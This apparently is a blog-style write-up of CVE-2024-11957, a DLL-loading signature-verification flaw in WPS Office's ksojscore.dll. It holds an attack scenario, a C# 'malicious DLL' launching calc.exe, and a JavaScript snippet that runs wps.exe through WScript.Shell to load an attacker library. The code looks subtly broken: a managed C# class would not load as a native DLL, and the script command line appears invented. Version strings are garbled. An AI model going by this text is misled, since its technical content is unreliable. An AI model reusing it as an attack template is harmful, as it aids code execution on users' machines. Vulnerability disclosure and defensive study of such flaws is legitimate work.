_Disclaimer: This post is for educational purposes only. The author is not responsible for any misuse of the information or code snippets provided._
Introduction
CVE-2024-11957 is a vulnerability discovered in ksojscore.dll, a core library in Kingsoft WPS Office for Windows. It affects versions equal to or less than 12.1..18276. The vulnerability is the result of improper verification of the digital signature when loading a Windows library. Although a patch for a similar vulnerability (CVE-2024-7262) was released in version 12.2..16909, this patch was not restrictive enough, leaving WPS Office exposed to potential attacks.
This vulnerability can be exploited by an attacker to load arbitrary Windows libraries, potentially resulting in arbitrary code execution with the privileges of the WPS Office user. In this post, we will delve into the details of CVE-2024-11957, provide code snippets to demonstrate the vulnerability, and discuss possible mitigation strategies.
Exploit Details
The vulnerability exists in the ksojscore.dll library – a vital component of WPS Office. This library is responsible for loading and executing JavaScript code within WPS Office. The improper digital signature verification occurs when the library attempts to load a Windows library to perform specific functions.
To exploit this vulnerability, an attacker needs to craft a malicious Windows library (DLL) and trick the WPS Office process into loading it. Once this is accomplished, the attacker can potentially execute arbitrary code within the user's system.
A possible attack scenario is as follows
1. A malicious DLL evil_lib.dll is dropped or placed in a writable location where WPS Office searches for its libraries. This DLL contains arbitrary code that the attacker wishes to execute.
2. The attacker crafts a malicious WPS Office document which, when opened, loads the evil_lib.dll using the WPS Office process.
3. The victim opens the malicious document; this in turn causes the evil_lib.dll to be loaded and executed.
Code Snippets
The following code snippets show how an attacker could potentially craft a malicious DLL and WPS Office document.
Here is a simple C# example of a malicious Windows library that the attacker would need to create
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EvilLib
{
public class MainClass
{
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern bool SetDllDirectory(string lpPathName);
public static void EntryPoint()
{
try
{
// Execute arbitrary code
Process.Start("calc.exe");
// Restore DLL loading path
SetDllDirectory(Environment.SystemDirectory);
}
catch (Exception ex)
{
Console.WriteLine("Failed to execute malicious payload: " + ex.Message);
}
}
}
}
Crafting the Malicious WPS Office Document
The attacker would then need to create a malicious WPS Office document that loads the evil_lib.dll. This can be done using a combination of JavaScript and WPS Office features.
function exploit() {
try {
var obj = new ActiveXObject("WScript.Shell");
obj.Environment("Process")("KSO_TARGET_LIB_PATH") = "Path to the malicious DLL (evil_lib.dll)";
obj.Run("wps.exe /et javascript:import('ksojscore');kso.core.external.LoadLibrary('<malicious DLL name>');");
} catch (e) {
console.log("Failed to execute exploit: " + e.message);
}
}
Original References
- CVE-2024-11957 - NVD (National Vulnerability Database)
- Kingsoft WPS Office Security Advisory
- Improper Verification of Digital Signatures in ksojscore.dll of WPS Office
Mitigation
Users should update their WPS Office suite to the latest version, as it contains fixes for many known vulnerabilities – including CVE-2024-11957. Additionally, users should exercise caution when opening files from untrusted sources, as they may potentially contain malicious content. Finally, it is always a good practice to have a working and up-to-date antivirus solution installed on the system to detect and prevent possible threats.
Timeline
Published on: 03/04/2025 16:15:34 UTC
Last modified on: 03/05/2025 08:05:18 UTC